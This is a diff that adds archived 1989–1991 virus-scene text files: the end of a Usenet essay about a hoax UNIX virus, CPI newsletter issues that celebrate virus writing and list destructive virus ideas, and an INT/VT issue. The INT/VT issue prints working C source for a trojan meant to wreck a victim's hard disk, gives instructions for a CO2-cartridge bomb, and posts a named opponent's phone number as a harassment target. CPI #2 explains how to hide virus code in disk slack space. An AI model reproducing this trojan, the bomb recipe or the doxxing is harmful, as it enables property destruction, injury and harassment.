defeated include 'crc' checks of source + files and, of course, careful examination of sources received + from insecure sites. + +- ----- + +Now I have to make a confession. This whole document is a hoax intended +to dramatize the problems involved with viruses and Usenet. I suspect that +most of you were clued to this by the Keywords line. While playing with the +idea and writing this article several things occurred to me: + +First of all, this virus is a much more complex program than any of the +viruses that have been spotted on personal computers. I think it has to be, +based on the design goals that a REAL UNIX virus must satisfy. I have not +attempted to actually implement it because of this. + + It must be small, to avoid detection. It must not cause files to +grow without bound. + + It must infect foreign files, otherwise it's not a virus... just a +Trojan Horse (like the bogus ARC and FLAG programs on the PC). Trojan horses +are a dime-a-dozen. + + It must infect source files, since this is the primary software +distribution channel for UNIX. A virus stuck on one machine is a boring +one. + + It must not break the infected program (other than what it might +care to do deliberately). + + It must not be obvious from a simple examination of the source (like, +changing main to Main and having a virus-main call Main). + +I believe that given these goals (which are, of course, subject to +debate) a simpler program would be successful in infesting more than a +small fraction of the machines that (say) comp.sources.misc reaches. + +There are systems immune to this particular attack, of course. Ones not +running UNIX, so sbrk() doesn't work. Or ones with radically different +versions of malloc(). Ones with no 'c' compiler. They are in the minority, +though. + +On the other hand a virus of this type could infest a large proportion +of the net before it was found. The virus I described does not cause any +direct damage, except for using up a relatively small amount of disk +space. A more vicious virus is possible. + +Other variations of this virus are obviously possible. For example, it +could be tagged onto any standard 'C' library routine... I chose malloc +merely because source was available and because it's something that people +complain about, so they wouldn't be likely to find an extra copy suspicious. +Another good routine would be perror(), for the same reason. This would have +the additional benefit of making the spread of the infection dependent on +an additional random factor, making it harder to detect the virus. + +Do I think something like this is likely? No. Especially not now that +I've written this little piece of science fiction. I'm sure that +eventually someone will try something unlike this, I suspect that their +virus would get caught much sooner than 'speedhack', because I think +that more people look at the source than conventional wisdom would lead +you to believe. But, again, this is just my personal opinion. Debate is +welcomed... that's why I did this in the first place: to inject some +sense into the debate currently raging in comp.sys.amiga. + +- -- + _--_|\ `-_-' Peter da Silva. +1 713 274 5180. +/ \ 'U` Have you hugged your wolf today? +\_.--._/ + v Disclaimer: People have opinions, organisations have policy. + + + \ No newline at end of file diff --git a/textfiles.com/virus/cpi-1.txt b/textfiles.com/virus/cpi-1.txt new file mode 100644 index 00000000..ba1f47cc --- /dev/null +++ b/textfiles.com/virus/cpi-1.txt @@ -0,0 +1,368 @@ + Computer Viruses - A Protagonist's Point Of View + -----===] CORRUPTED PROGRAMMING INTERNATIONAL [===----- + + == CPI Newsletter #1 == + [ Article Written By Doctor Dissector ] + Released : June 30, 1989 + + Call The CPI Headquarters + 619-566-7093 + 1200/2400 Baud :: Open 24 Hours + + + + [1.1] Introduction: + ------------------- + + Welcome to "Computer Viruses - A Protagonist's Point Of View." This + letter, perhaps the beginning of a small newsletter. Well, this "letter," + is written by one person right now, maybe I'll get some people to send in + more info, ideas, and examples to CPI. If you would like to contribute, + please upload text files to CPI Headquarters (see heading for number) and + leave a note to me telling me you are contributing to our magazine. + + Well, as an overview, this article will cover a few topics dealing + with viruses; however, there will be no examples covered as we are short of + programmers at the moment. That reminds me, if you would like to become a + member of CPI, fill out the accompanying text file and upload it to CPI HQ + as an upload to the Sysop, then leave me and the Sysop some mail to tell us + you registered to become a member. We will get back to you as soon as + possible. + + The purpose of this magazine is to expand and broaden the general + computer user's view and knowledge of the dreadful computer Virus, as well + as a bit on Trojans (not the hardware, the SOFTWARE!). Then, after the + knowledge of these computer crackers is better understood, the second + purpose of this newsletter is to teach both methods of developing and + executing a better virus/trojan. We, CPI, feel viruses and trojans are a + vital part of the computer world, and should stand along the trades of + hacking, phreaking, cracking, pirating, and pyro as an equal, not something + to be looked down upon (unless you are hit by one...). + + In the future, we hope CPI will grow and spread, just like a virus, + and encompass a large domain of the crackers, hackers, and other elite out + there so that the life of this group will be maintained, and that this + newsletter, hopefully, won't be the only issue to be released during the + group's existence. + + Also, please note that this newsletter is purely for the spread of new + ideas and to educate the reader of this "new" software technonlogy, and the + document, and the author of the document do not encourage or support any + illegal use of the information contained, and the reader is solely + responsible for their actions after aquiring this document. + + Doctor Dissector + CPI/ANE/TPH Author/Editor + Phortune 500 + + --[ Table Of Contents ]---------------------------------------------------- + + Phile Subject Author + ----- --------------------------------------------------------- + 1.1 Introduction & Table Of Contents.........Doctor Dissector + 1.2 Viruses- What, Where, Why, How...........Doctor Dissector + 1.3 Aspects Of Some Known Viruses............Doctor Dissector + 1.4 Ideas For Future Viruses.................Doctor Dissector + 1.5 Suggested Reading........................Doctor Dissector + 1.6 Conclusion...............................Doctor Dissector + 1.x CPI Application..........................Doctor Dissector + +Subject: CPI Issue 1 2/6 + + + ---------------------------------------------------------------------- + + [1.2] Viruses- What, Where, Why, How + + + If you are a beginner in this field, you may be curious to what + a virus/trojan is. Perhaps you heard about it through some BBS, or + known someone who had their system crashed by one. Well, this is for + you. + + In the Trojan War, way back when, there existed the Trojan + Horse, right? Well, nowadays, there is a modern version of the Trojan + Horse existing is software. The modern, computer, Trojan horse is + really simple, a psychedelic hacker implants destructive code into a + normal (or fake) file. This modified/fake file, when executed will + destroy or remove something from the host computer, usually format + the hard drive, delete all files, or something similar. In order to + distribute the corrupt phile, the hacker goes and does one or more of + various things; depending on how deranged this individual is (hehe). + These things are covered in the following section. + + A virus, in normal terms is an organism which spreads malign + from one host to another, transmitting itself through biological + lines so that both the previous host and the future host become + infected with the virus. Today, there are computer viruses, and just + like biological viruses, they spread from file to file, host to host, + infecting everything it "sees." These computer viruses can either + destroy the code it infects immediately, or over a period of time, + corrupt or damage the host system it thrives upon. For example, a + virus hidden in a file on a BBS could be downloaded to a host system. + Then, the user who downloaded it executes the file, which executes + normally (as seen by the operator), but at the same time, the virus + attacks other files, and infects them, so that each file owned by the + user becomes infected with the virus. Then, at a given time or when + something is fulfilled by the host system, the virus becomes a trojan + and destroys, encrypts, or damages everything available, infected or + un-infected. In general, a virus is a timed trojan that duplicates + itself to other files, which, in effect sustains the virus's life- + span in the computer world, as more host systems are infiltrated by + the disease. + + Now that I've given you a description of the computer virus and + trojan, we can go onto more complex things... well, not really... + + Ok, now, let's trace the life of a virus. A virus/trojan is born + in the mind of some hacker/programmer that decides to develop + something out of the ordinary, not all viruses/trojans are + destructive, often, some are amusing! Anyway, the hacker programs the + code in his/her favorite language; viruses can be developed with + virtually any language, BASIC, Pascal, C, Assembly, Machine Code, + Batch files, and many more. Then, when the disease is complete and + tested, the hacker intentionally infects or implants the code into a + host file, a file that would be executed by another un-suspecting + user, somewhere out there. Then, the hacker does one or more of many + things to distribute his baby. The hacker can upload the infected + file to a local BBS (or many local/LD BBS's), give the infected file + to a computer enemy, upload the infected file to his/her workplace + (if desired...hehe), or execute the phile on spot, on the host + system. Then, the virus, gets downloaded or executed, it infiltrates + the host system, and either infects other files, or trashes the + system instantly. Eventually, the infected system's user gets smart + and either trashes his system manually and starts fresh, or some mega- + technical user attempts to recover and remove the virus from all of + the infected files (a horrendous job). Then, the virus dies, or other + host systems that were previously infected continue, and accidentally + upload or hand out infected files, spreading the disease. Isn't that + neat? + + Now, to answer your questions; I already explained what a + virus/trojan is and how they are developed/destroyed. Now, where do + these suckers come from? Why, some hacker's computer room, of course! + All viruses and trojans begin at some computer where some maniacal + hacker programs the code and implants it somewhere. Then, you ask, + why do they do this? Why hack? Why phreak? Why make stupid pyro piles + of shit? Think about it... This is an ART! Just like the rest. While + Hacking delivers theft of services, Phreaking delivers theft of + services, Cracking/Pirating delivers theft of software and copyright + law breaks, Pyro delivers unlawful arson/explosives, Viruses and + Trojans vandalize (yes, legally it is vandalism and destruction of + property) computer systems and files. Also, these are great to get + back at arch-computer enemies (for you computer nerds out there), and + just wreak havoc among your computer community. Yeah, PHUN at it's + best... + + ---------------------------------------------------------------------- +Subject: CPI Issue 1 3/6 + + + ---------------------------------------------------------------------- + + [1.3] Aspects Of Some Known Viruses + + + Many viruses have been written before and probably after you + read this article. A few names include the Israeli, Lehigh, Pakistani + Brain, Alameda, dBase, and Screen. Keep in mind that most viruses + ONLY infect COM and EXE files, and use the Operating System to spread + their disease. Also, many viruses execute their own code before the + host file begins execution, so after the virus completes passive + execution (without "going off") the program will load and execute + normally. + + Israeli - This one is a TSR virus that, once executed, stayed in + memory and infected both COM and EXE files, affecting both HARD and + FLOPPY disks. Once executed, the virus finds a place to stay in the + system's memory and upon each execution of a COM or EXE file, copies + itself onto the host phile. This one is very clever, before infecting + the file, it preserves the attributes and date/time stamp on the + file, modifies the files attributes (removes READ only status so it + can write on it), and then restores all previous values to the file. + This virus takes very little space, and increases the host file size + by approximately 1800 bytes. The trigger of this virus is the date + Friday the 13th. This trigger will cause the virus to either trash + the disk/s or delete the files as you execute them, depending on the + version. Whoever wrote this sure did a nice job.... + + Lehigh - This one infects the COMMAND.COM file, which is always + run before bootup, so the system is ready for attack at EVERY bootup. + It hides itself via TSR type and when any disk access is made, the + TSR checks the COMMAND.COM to see if it is infected. Then if it + isn't, it infects it, and adds a point to its counter. When the + counter reaches 4, the virus causes the disk to crash. This one, + however, can be stopped by making your COMMAND.COM Read-Only, and the + date/time stamp is not preserved, so if the date/time stamp is + recent, one could be infected with this virus. This virus is + transferred via infected floppy disks as well as a clean disk in an + infected system. It can not infect other hosts via modem, unless the + COMMAND.COM is the file being transferred. + + Pakistani Brain - This one infects the boot sector of a floppy + disk. When booting off of the disk, the virus becomes a TSR program, + and then marks an unused portion of the disk as "bad sectors." The + bad sectors, cannot be accessed by DOS. However, a disk directory of + an infected disk will show the volume label to be @ BRAIN. A CHKDSK + will find a few bad sectors. When you do a directory of a clean disk + on an infected system, the disk will become infected. The virus has + no trigger and immediately begins to mark sectors bad even though + they are good. Eventually, you will have nothing left except a bunch + of bad sectors and no disk space. The virus itself has the ASCII + written into it with the words "Welcome the the Dungeon" as well the + names of the supposed authors of the virus, and address, telephone + number, and a few other lame messages. To inoculate your system + against this virus, just type 1234 at byte offset location 4 on the + boot track (floppy disks). + + Alameda - This virus also infects the boot sector of the host + system. It is very small and inhabits ONE sector. This one only + damages floppy disks. If you boot from a diseased disk, the virus + loads itself into HIGH memory and during a warm boot, it remains in + memory and infects any other clean disks being booted from on the + infected system. It then replaces the boot track with the virus track + and replaces the boot track on the last track of the disk, so any + data located on the last track is corrupted. All floppy disks + inserted during reboot can catch this virus. This virus only infects + IBM PC's and XT's, however, it does not infect 286's or 386's. + + dBase - This one is a TSR virus that works in a manner similar + to the Israeli virus. It looks for files with a DBF extension, then + it replicates itself in all DBF files, preserving file size, and all + attributes. After the first 90 days, the virus destroys your file + allocation table and corrupts all data in the DBF files. This virus + creates a hidden file, BUG.DAT that indicates the bytes transposed + (in order to preserve file specifications). Run a CHKDSK to make sure + you don't have any extra hidden files or a BUG.DAT in your dBase + directory. If you create a BUG.DAT file manually in your directory, + making it read-only, you will be safe from this virus. + + Screen - This one is another TSR virus that comes on and off + periodically. When it is on, it examines the screen memory and looks + for any 4 digits starting at a random place on the screen. Then it + transposes two of them, this is not a good thing. It infects every + COM file in your directory, HARD and FLOPPY disks can be infected. + You can use a ASCII searcher to check if you are infected by + searching for "InFeCt" in your COM files. If you have this written, + read the 4 bytes immediately preceding it and overwrite the first 4 + bytes of the program with their value. Then, truncate the program at + their stored address. You will rid yourself of this virus. Make sure + you use a clean copy of you editor for this. + + Other viruses include MAC, AMIGA, and many other environments. + By the way, other computer systems other than IBM/DOS may become part + of CPI if you qualify. + + Anyway, these are a few viruses I have read on and thus passed + the information to you, I hope you can learn from them and get some + ideas for some. + +Subject: CPI Issue 1 4/6 + + + ---------------------------------------------------------------------- + + [1.4] Ideas For Future Viruses + + + Since I have covered viruses already in existence, lets talk + about viruses that can or may exist in the near future. These are not + even close to half the ideas possible for destruction with + trojans/viruses available, but will pose as a challenge to you who + are short of ideas. + + CSR Virus - A CMOS Stay Resident VIRUS that will implant itself + in the CMOS memory of the AT (286/386/486?) which will execute upon + every bootup. This one would be VERY nice. + + Failsafe Virus - Preserves ALL attributes, Preserves file size, + remains TSR but hidden to TSR location programs, Modifies attributes + to get around Read-Only files, Infects ALL files (Not only COM and + EXE), encrypts all data on trigger (irreversible) but preserves + original file size/attributes. + + Format Virus - A virus which is TSR and when a DOS format or any + other FORMAT type of call is called, will FORMAT every other track, + but will not allow DOS to notice. + + Write Virus - A virus that intercepts write to disk, which + deletes the disk write, and marks sector as bad at write point. + + ASCII Virus - Virus that would scramble ASCII text in any file + at trigger. + + Low Level Format Virus - Virus that low level formats (BAD + format) HD in background with data still intact. I have seen regular + background LLF programs, and it keeps data in place, but it does it + correctly... hmmm...? + + Hide Virus - A Virus that hides files slowly. + + Crash Virus - Virus that emulates typical system crashes/freezes + occasionally. Causes BIOS to freeze and write BIOS ERROR messages on + screen. + + Modem Virus - One that remains in boot sector and TSR and + monitors data from serial ports, puts in "artificial" line-noise. + NICE! + + These are just a few I thought up... these could be really + good... Think of some more and call CPI HQ TODAY! + +Subject: CPI Issue 1 5/6 + + + ---------------------------------------------------------------------- + + [1.5] Suggested Reading + + + The following list is a compiled listing of some material I have + read as well as other sources you MIGHT find information on + concerning viruses and trojan horses. Happy trashing.... + + + "Know Thy Viral Enemy" by Ross M. Greenberg + BYTE Magazine + June 1989, pg 275-280 + + "Viruses: Assembly, Pascal, BASIC & Batch" by Tesla Coil ][ + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #3, Volume 2, Phile #2 + + "A Boot Sector Virus" by Southern Cross + Phreakers And Hackers Underground Network Newsletter (PHUN) + Issue #4, Volume 2, Phile #3 + + "Computer Viruses: A High Tech Disease" by Abacus + 2600 Magazine + Volume 5, Number 2 + +Subject: CPI Issue 1 6/6 + + + ---------------------------------------------------------------------- + + [1.6] Conclusion + + + Thus ends the first issue of CPI's "Computer Viruses: A + Protagonist's Point Of View." We hope you enjoyed it and we hope it + was informative and complete (at least about the specific issues). + + We, CPI, hope that you will share your information and comments + with us at CPI Headquarters, as this newsletter will require both + information and an expansion of our current member base. If you feel + you have what it takes to gather, read, or program for CPI, send us + an application today. + + Oh yeah, if this happens to be the only issue of CPI, oh well, + and many thanx to those who read it at least once, and enjoyed it (or + laughed at it). Until our (my?) next issue, have phun and don't get + toooo wild...... + + + + + =====[ CPI Headquarters * 619-566-7093 * 1200/2400bps * 24Hrs ]===== + diff --git a/textfiles.com/virus/cpi-2.txt b/textfiles.com/virus/cpi-2.txt new file mode 100644 index 00000000..e16ec1b8 --- /dev/null +++ b/textfiles.com/virus/cpi-2.txt @@ -0,0 +1,2193 @@ +[2.1] * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + * * + * @@@@@@@@@@@@@ @@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ @@@@@@@@@@@@@@@ * + * @@@@ @@@@ @@@@ @@@@ @@@ * + * @@@ @@@ @@@@ @@@ * + * @@@ @@@@@@@@@@@@@@@ @@@ * + * @@@ @@@@@@@@@@@@@@ @@@ * + * @@@ @@@ @@@ * + * @@@@ @@@@ @@@ @@@ * + * @@@@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * @@@@@@@@@@@@@ @@@ @@@@@@@@@@@@@@@ * + * * + * * * * * * * * * * * * * * * * * * * * * * * * * * * * * + + C O R R U P T E D + + P R O G R A M M I N G + + I N T E R N A T I O N A L + + + + presents: + + + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + @ @ + @ Virili And Trojan Horses @ + @ @ + @ A ProtagonistYs Point Of View @ + @ @ + @ Issue #2 @ + @ @ + @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + + + DISCLAIMER::All of the information contained in this newsletter reflects the + thoughts and ideas of the authors, not their actions. The sole + purpose of this document is to educate and spread information. + Any illegal or illicit action is not endorsed by the authors or + CPI. The authors and CPI are not responsible for any information + which may present itself as old or mis-interpreted, and actions + by the reader. Remember, ZJust Say No!Y + + + + + + + + + + + + +CPI #2 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Issue 2, Volume 1 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ +Release Date::July 27,1989 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ + + + + + + Introduction To CPI#2 + --------------------- + Well, here is the olong awaited@ second issue of CPI, A ProtagonistYs Point +of view. This issue should prove a bit interesting, I dunno, but at least +entertaining for the time it takes to read. Enjoy the information and donYt +forget the disclaimer. + Oh yes, if you have some interesting articles or an application to send +us, just see the BBS list at the end of this document. Thanx. All applications +and information will be voted on through the CPI Inner Circle. Hope you enjoy +this issue as much as we enjoyed typing it... hehe... + Until our next issue, (which may be whenever), good-bye. + + Doctor Dissector + + + Table of Contents + ----------------- + Part Title Author + ----------------------------------------------------------------------------- + 2.1 Title Page, Introduction, & TOC....................... Doctor Dissector + 2.2 Another Explanation Of Virili And Trojans............. Acid Phreak + 2.3 V-IDEA-1.............................................. Ashton Darkside + 2.4 V-IDEA-2.............................................. Ashton Darkside + 2.5 The Generic Virus..................................... Doctor Dissector + 2.6 Aids.................................................. Doctor Dissector + 2.7 Batch File Virus...................................... PHUN 3.2 + 2.8 Basic Virus........................................... PHUN 3.2 + 2.9 The Alemeda Virus..................................... PHUN 4.3 + 2.10 Virili In The News.................................... Various Sources + 2.11 Application For CPI................................... CPI Inner Circle + (CPI Node Phone #Ys Are In 2.11) + + +========================================================================= +Subject: INTVT Issue 2 1/1 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + + + The International Network of Thieves 2/16/91 + Virus and Trojan Oriented + Volume No. 2 + + Welcome back! Hey guys, (and gals I hope!) error in last issue, the date +was incorrect. The actual date of INT/VT1.TXT should have been 1/29/91. Sorry +dudez, had some people think it was a year old... Ok, geez, already issue two? +You people have been waiting for it haven't you? GOOD! + +VERY IMPORTANT NEWS! +-------------------- + Gene Dunn, (handle is Unimax) a PD'er and Virus hater is on the prowl. He +has called The Edge of Destruction(817-473-3621) many times, and actually came +over to MY house once. He is threatening to take me to court. He got a virus +on his PD BBS and wants The EoD shut down because of its virus support, and +because it is the home of INT/VT!!!! This man is a mad man. I won't take the +BBS down! But if the court says so, oh well! HEY! THIS GUY IS THREATENING THE +HOME OF INT/VT!!! His name again is GENE DUNN,(Actually Eugene I believe) and +the number to his BBS is 817-834-0143. What you do with that info is up to you. + +DISCLAIMER +---------- + The writers of this article, nor the sysops of The EoD, are responsible for +what you do with the information found/discussed here. You the user/reader of +this are soley responsible for what you do with this information, as it is +provided for programming research only, and not for ANY illegal uses. + +HOW WAS LESSON ONE? +------------------- + How did everyone do on your first lesson? Did you try it? On what? I'd +really enjoy it if you'd call The EoD and leave me mail about it. Also, if you +plan to continue with these issues and do the examples, I would recommend that +you get a copy of flushot(also available on The EoD), so as to watch the +virii/trojans as they work. + +INT/VT APPLICATION +------------------ + In this issue of INT/VT we will be including an application for joining our +association. Please fill it out and upload it to the SYSOP UPLOADS on The Edge +of Destruction BBS, 817-473-3621. You will be notified via E-Mail of your +status as a member. Thank You. + +SOME INFORMATION ABOUT DEBUG +---------------------------- + Since not everyone has Turbo Debugger, sNOOp, or some of the nicer +de-buggers, we're going to stick with using the DOS debug. Those of you who +already write virii and or are familiar with debug, you may want to skip this +section and pick up later down in the article. This is for the beginners to +debug. Here are some of the basic listing of commands for debug: + + COMMAND / USAGE / COMMENTS + A A[address] A0100:0100 Start assembling at address 0100:0100 + In most cases A0100 is all that is neccessary. + C C[range address] CC100,1FF 300 Compare portion of memory + D D[range] D0100 Displays the contents of memory at 0100 + E E[address] E0100 Start entering byte values at 0100 + F F[range list] F0100 L 100 fill 100 bytes + G G[address] G runs the current program + H H[values] H 100 108 ads and subtracts hex numbers + I I[value] I2F8 input one byte from port specified + L L[address] Load + M M[range address] move blocks of memory + N N[name] Names file (i.e. N Joe.exe) + O O[value byte] sends specified byte to output port + Q Q Terminates Debug + R R[register] Shows the register and edit it + S S[range list] Search the specified range for bytes + T T Trace through program + U U[address] Unnassemble at address x, u0100 + W W[amt. of bytes] Save to disk + + While these are not explained in great detail, it is not neccessary to +do so at this time, but as we use them it will be. I recommend you go to the +bookstore and purchase Peter Norton's Guide to Assembly Language. It will run +you about $25.00 and then download MASM5.0 from The EoD. MASM stand for +Microsoft Assembler, for you who are new to this. Also available are Turbo C +and Turbo C++ v2.00 and Turbo Pascal v6.00. Feel free to call and D/L these +files. Reading Peter Norton's book will make what you find here much easier. +Also, it will teach you how to program in assembler. Something we DO NOT plan +to do here, but to sharpen your knowledge, or HELP you learn it. Something else +you need is the BOOK of INT's. Soon to be available on The EoD. + +LESSON 2, ANOTHER SIMPLE TROJAN IN C +------------------------------------ + Our last trojan was in ASM, this one is in C. And known as Crazy. What it +does is makes tons of directories on someones HD. You say, "ooo, big deal." +Exactly, its a VERY BIG deal. In DOS, you can not remove more than one DIR at a +time. Can you imagine removing all of those DIR's by hand? It could take +weeks, months, or years. + + +/* Thanks to Ninja Wala of SUP for writing such a niftey trojan! */ + + + +#include +#include /* Include Files */ +#include /* Used by C to make life easier */ + +main() +{ + int i,j; /* Names I and J as variables */ + char tmp[20]; + char far *ptr; + + for (i=0;i<=50;i++){ /* random loop to make dirs */ + srand(rand()); + ptr = itoa(rand(),tmp,10); + mkdir ( ptr ); /* makes the DIR */ + chdir ( ptr ); + for (j=0;j<=50;j++){ + ptr = itoa(rand(),tmp,10); + mkdir( ptr ); + } + chdir ("\\"); + } +} + + While we are not going deep into how this works, we give you the source +so you can compile it and have some real nice fun killing an HD. If you would +like the compiled version (EXE version) you can get it off of many BBS's +including The EoD. + +NEXT ISSUE +---------- + In the next issue we will actually look at the inner workings of a virus. +Rather than a trojan. As to which virus, we can not be sure at this time. +Also, we will start our virus description and fake virus section. + +JUST FOR ANARCHISTS - CO2 Cartidge Bomb! +---------------------------------------- + Ok dudez, here is a nice mailbox or toilet bomb. Let the air out of the +CO2 cartridge, I don't care how. Use a nail, knife, screwdriver, or whatever +else to make the hole a bit bigger. Fill it with gunpowder and pack it down by +tapping the bottom of the CO2 cartridge on a hard surface. Insert a fuse, (I +recommend a good waterproof cannon fuse, but a firecracker fuse will work if its +all you can find.) Use something that seals real hard and tight. I have used +silicon before, but I think you cand find something that will try much harder if +you look. Find your destination. Light it. RUN! FAST! If it blows with you +near it. Better be a hospital near. I flushed one down a toilet at a Fina +Station and the Toilet CRACKED and started leaking. Not to mention water was +everywhere! Dripping from the ceiling and the walls. + +CALL OUR HOME WORLD +------------------- + Call our HQ BBS: The Edge of Destruction - 817-473-3621 + +APOLOGY +------- + We realize that this issue was not as informative as some of you were +hoping. The reason for this is the problem of Gene Dunn. We have had little or +no time to donate to INT/VT due to his insanity. We hope to have a MUCH, MUCH +more interesting Issue as Issue 3. Which you should see in about 1-2 weeks. + +Subject: CPI Issue 2 2/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.2] + Explanation of Viruses and Trojans Horses + ----------------------------------------- + Written by Acid Phreak + + Like itYs biological counterpart, a computer virus is an agent of +infection, insinuating itself into a program or disk and forcing its host +to replicate the virus code. Hackers fascinated by the concept of oliving@ +code wrote the first viruses as projects or as pranks. In the past few +years, however, a different kind of virus has become common, one that lives +up to an earlier meaning of the word: in Latin, virus means poison. + These new viruses incorporate features of another type of insidious +program called a Trojan horse. Such a program masquerades as a useful +utility or product but wreaks havoc on your system when you run it. It may +erase a few files, format your disk, steal secrets--anything software can +do, a Trojan horse can do. A malicious virus can do all this then attempt +to replicate itself and infect other systems. + The growing media coverage of the virus conceptand of specific viruse +has promoted the development of a new type of software. Antivirus programs, +vaccines--they go by many names, but their purpose is to protect from virus +attack. At present there are more antivirus programs than known viruses +(not for long). + Some experts quibble about exactly what a virus is. The most widely +known viruses, the IBM Xmas virus and the recent Internet virus, are not +viruses according to some experts because they do not infect other programs. +Others argue that every Trojan horse is a virus--one that depends completely +on people to spread it. + +How They Reproduce: +------------------- + Viruses canYt travel without people. Your PC will not become infected +unless someone runs an infected program on it, whether accidentally or on +purpose. PCYs are different from mainframe networks in this way--the +mainframe Internet virus spread by transmitting itself to other systems and +ordering them to execute it as a program. That kind of active transmission +is not possible on a PC. + Virus code reproduces by changing something in your system. Some viruses +strike COMMAND.COM or the hidden system files. Others, like the notorious +Pakistani-Brain virus, modify the boot sector of floppy disks. Still others +attach themselves to any .COM or .EXE file. In truth, any file on your +system that can be executed--whether itYs a program, a device driver, an +overlay, or even a batch file--could be the target of a virus. + When an infected program runs, the virus code usually executes first and +then transfers control to the original program. The virus may immediately +infect other programs, or it may load itself into RAM and continue spreading. +If the virus can infect a file that will be used on another system, it has +succeeded. + +What They Can Do: +----------------- + Viruses go through two phases: a replication phase and an action phase. +The action doesnYt happen until a certain even occurs--perhaps reaching a +special date or running the virus a certain number of times. It wouldnYt +make sense for a virus to damage your system the first time it ran; it needs +some time to grow and spread first. + The most vulnerable spot for a virus attack is your hard diskYs file +allocation table (FAT). This table tells DOS where every fileYs data resides +on the disk. Without the FAT, the dataYs still there but DOS canYt find it. +A virus could also preform a low-level format on some or all the tracks of +your hard disk, erase all files, or change the CMOS memory on AT-class +computers so that they donYt recognize the hard disk. + Most of the dangers involve data only, but itYs even possible to burn +out a monochrome monitor with the right code. + Some virus assaults are quite subtl. One known virus finds four +consecutive digits on the screen and switches two. LetYs hope youYre not +balancing the companyYs books when this one hits. Others slow down system +operations or introduce serious errors. + + +Subject: CPI Issue 2 3/11 +To: tk0jut2 +Original_To: BITNET%"tk0jut2@niu" + + +[2.3] +------------------------------------------------------------------------------- + ______ ________ ___________ + / ____ \ | ____ \ |____ ____| + | / \_| | | \ | | | + | | | |_____| | | | + | | | ______/ | | + | | _ | | | | + | \____/ | /\ | | /\ ____| |____ /\ + \______/ \/ |_| \/ |___________| \/ + + + oWe ainYt the phucking Salvation Army.@ + +------------------------------------------------------------------------------- + + + C O R R U P T E D P R O G R A M M E R S I N T E R N A T I O N A L + + * * * present * * * + + oOk, IYve written the virus, now where the hell do I put it?@ + + By Ashton Darkside (DUNE / SATAN / CPI) + + +******************************************************************************* +DISCLAIMER: This text file is provided to the massed for INFORMATIONAL PURPOSES + ONLY! The author does NOT condone the use of this information in any manner + that would be illegal or harmful. The fact that the author knows and spreads + this information in no way suggests that he uses it. The author also accepts + no responsibility for the malicious use of this information by anyone who + reads it! Remember, we may talk alot, but we ojust say no@ to doing it. +******************************************************************************* + + + + + + + + + + Ok, wow! YouYve just invented the most incredibly nifty virus. It +slices, it dices, it squshes, it mushes (sorry Berke Breathed) peopleYs data! +But the only problem is, if you go around infecting every damn file, some cute +software company is going to start putting in procedures that checksum their +warez each time they run, which will make life for your infecting virus a total +bitch. Or somebodyYs going to come up with an incredibly nifty vaccination util +that will wipe it out. Because, i mean, hey, when disk space starts vanishing +suddenly in 500K chunks people tend to notice. Especially people like me that +rarely have more than 4096 bytes free on their HD anyway. Ok. So youYre saying +owow, so what, I can make mine fool-proof@, etc, etc. But wait! ThereYs no need +to go around wasting your precious time when the answer is right there in front +of you! Think about it, you could be putting that time into writing better and +more inovative viruses, or you could be worring about keeping the file size, +the date & time, and the attributes the same. With this system, you only need +to infect one file, preferably one thatYs NOT a system file, but something that +will get run alot, and will be able to load your nifty virus on a daily basis. +This system also doesnYt take up any disk space, other than the loader. And the +loader could conceivably be under 16 bytes (damn near undetectable). First of +all, you need to know what programs to infect. Now, everybody knows about using +COMMAND.COM and thatYs unoriginal anyway, when there are other programs people +run all the time. Like DesqView or Norton Utilities or MASM or a BBS file or +WordPerfect; you get the idea. Better still are dos commands like Format, Link +or even compression utilities. But you get the point. Besides, whoYs going to +miss 16 bytes, right? Now, the good part: where to put the damn thing. One note +to the programmer: This could get tricky if your virus is over 2k or isnYt +written in Assembly, but the size problem is easy enough, it would be a simple +thing to break your virus into parts and have the parts load each other into +the system so that you do eventually get the whole thing. The only problem with +using languages besides assembly is that itYs hard to break them up into 2k +segments. If you want to infect floppys, or smaller disks, youYd be best off to +break your file into 512 byte segments, since theyYre easier to hide. But, hey, +in assembly, you can generate pretty small programs that do alot, tho. Ok, by +now youYve probably figured out that weYre talking about the part of the disk +called Zthe slackY. Every disk that your computer uses is divided up into parts +called sectors, which are (in almost all cases) 512 bytes. But in larger disks, +and even in floppies, keeping track of every single sector would be a complete +bitch. So the sectors are bunched together into groups called ZclustersY. On +floppy disks, clusters are usually two sectors, or 1024 bytes, and on hard +disks, theyYre typically 4096 bytes, or eight sectors. Now think about it, you +have programs on your hard disk, and what are the odds that they will have +sizes that always end up in increments of 4096? If IYve lost you, think of it +this way: the file takes up a bunch of clusters, but in the last cluster it +uses, there is usually some ZslackY, or space that isnYt used by the file. This +space is between where the actual file ends and where the actual cluster ends. +So, potentially, you can have up to 4095 bytes of ZslackY on a file on a hard +disk, or 1023 bytes of ZslackY on a floppy. In fact, right now, run the Norton +program ZFS /S /TY command from your root directory, and subtract the total +size of the files from the total disk space used. ThatYs how much ZslackY space +is on your disk (a hell of alot, even on a floppy). To use the slack, all you +need to do is to find a chunk of slack big enough to fit your virus (or a +segment of your virus) and use direct disk access (INT 13) to put your virus +there. There is one minor problem with this. Any disk write to that cluster +will overwrite the slack with ZgarbageY from memory. This is because of the way +DOS manages itYs disk I/O and it canYt be fixed without alot of hassles. But, +there is a way around even this. And it involves a popular (abeit outdated and +usually ineffectual) form of virus protection called the READ-ONLY flag. This +flag is the greatest friend of this type of virus. Because if the file is not +written to, the last cluster is not written to, and voila! Your virus is safe +>from mischivious accidents. And since the R-O flag doesnYt affect INT 13 disk +I/O, it wonYt be in your way. Also, check for programs with the SYSTEM flag set + + + + 